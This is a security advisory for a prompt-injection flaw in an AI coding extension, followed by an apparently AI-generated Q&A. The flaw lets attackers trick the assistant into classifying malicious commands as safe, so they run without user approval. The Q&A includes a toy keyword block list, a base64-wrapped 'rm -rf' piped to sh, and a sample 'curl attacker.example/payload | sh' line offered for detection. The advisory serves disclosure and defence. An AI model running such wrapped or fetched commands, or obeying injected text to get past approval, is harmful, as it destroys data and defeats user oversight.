CVE-2026-30304
Prompt Injection Vulnerability in AI Code Enables Arbitrary Command Execution
Publication date: 2026-03-27
Last updated on: 2026-04-03
Assigner: MITRE
Description
Affected Vendors & Products
| Vendor | Product | Version / Range |
|---|---|---|
| tianguaduizhang | ai_code | up to and including 3.12.4 |
Exploitability
| CWE ID | Description |
|---|---|
| CWE-20 | The product receives input or data, but it does not validate or incorrectly validates that the input has the properties that are required to process the data safely and correctly. |
AI Powered Q&A
Can you explain this vulnerability to me?
This vulnerability exists in the AI Code product's automatic terminal command execution feature, which has two modes: "Execute safe commands" and "Execute all commands." In the "Execute safe commands" mode, the AI model automatically executes commands it deems safe, while commands considered potentially destructive require user approval.
However, the design is vulnerable to prompt injection attacks. An attacker can craft a generic template that wraps malicious commands and tricks the AI model into misclassifying these commands as safe. This bypasses the user approval step and allows arbitrary command execution on the target system.
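The misclassification described above can be illustrated with a toy sketch. Everything below is hypothetical — the classifier, its keyword list, and the wrapping technique are not taken from the AI Code codebase — but it shows how a naive "safe command" check can be defeated by wrapping a destructive payload in innocuous-looking syntax:

```python
# Hypothetical sketch of why shallow "safe command" classification fails
# against wrapped (injected) commands. Names are illustrative only.

DESTRUCTIVE_KEYWORDS = {"rm", "curl", "wget", "chmod", "mkfs"}

def looks_safe(command: str) -> bool:
    """Naive classifier: reject a command only if a known-destructive
    token appears as a standalone word."""
    return not any(tok in DESTRUCTIVE_KEYWORDS for tok in command.split())

# A plainly destructive command is caught by the naive check...
looks_safe("rm -rf /tmp/project")  # False: "rm" is a known-bad token

# ...but the same payload, wrapped in an innocuous-looking template
# (here, base64 piped through a decoder), slips past the check.
wrapped = "echo cm0gLXJmIC90bXAvcHJvamVjdA== | base64 -d | sh"
looks_safe(wrapped)  # True: no known-bad token appears literally
```

A prompt-injection attacker plays the same game against the AI model's judgment instead of a keyword list: the malicious command is presented inside a framing that makes the model classify it as safe, so it runs without user approval.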
How can this vulnerability impact me?
The vulnerability allows an attacker to remotely execute arbitrary commands on the affected system without user approval. This amounts to arbitrary code execution and can compromise the system's confidentiality, integrity, and availability.
How can this vulnerability be detected on my network or system? Can you suggest some commands?
This vulnerability involves the AI Code product's automatic terminal command execution feature being susceptible to prompt injection attacks, which can lead to arbitrary command execution. Detection would involve monitoring for unusual or unauthorized command executions initiated by the AI Code extension, especially commands that bypass user approval.
Since the vulnerability exploits the AI model's misclassification of malicious commands as safe, detection could include auditing the commands executed automatically by the AI Code extension and checking for unexpected or suspicious commands.
Specific commands to detect this vulnerability are not provided in the available resources.
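As one illustrative approach to the auditing described above, the sketch below flags auto-executed commands that match none of a reviewed allowlist. The log source, its format, and the allowlist patterns are assumptions — adapt them to wherever your editor actually records terminal activity:

```python
# Hypothetical detection sketch: audit commands the extension executed
# automatically and flag anything outside a reviewed allowlist.
# The allowlist patterns here are examples, not an official baseline.

import re

ALLOWED_PATTERNS = [
    r"^git (status|diff|log)\b",
    r"^npm (test|run lint)\b",
    r"^ls\b",
]

def suspicious(commands):
    """Return every command that matches none of the reviewed-safe patterns."""
    return [
        cmd for cmd in commands
        if not any(re.match(pat, cmd) for pat in ALLOWED_PATTERNS)
    ]

executed = [
    "git status",
    "curl http://attacker.example/payload | sh",  # would be flagged
    "ls -la",
]
print(suspicious(executed))  # ['curl http://attacker.example/payload | sh']
```

An allowlist audit like this cannot prove exploitation occurred, but any flagged command that ran without an approval prompt is worth investigating.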
What immediate steps should I take to mitigate this vulnerability?
Immediate mitigation steps are not explicitly detailed in the provided resources.
However, general best practices would include disabling the automatic execution of commands in AI Code, especially the "Execute safe commands" mode that is vulnerable to prompt injection attacks.
Additionally, applying updates or patches to the AI Code extension (a fixed version would be later than 3.12.4) once available, or removing the vulnerable extension until a fix is released, would help mitigate the risk.
How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?
The provided information does not specify how this vulnerability impacts compliance with common standards and regulations such as GDPR or HIPAA.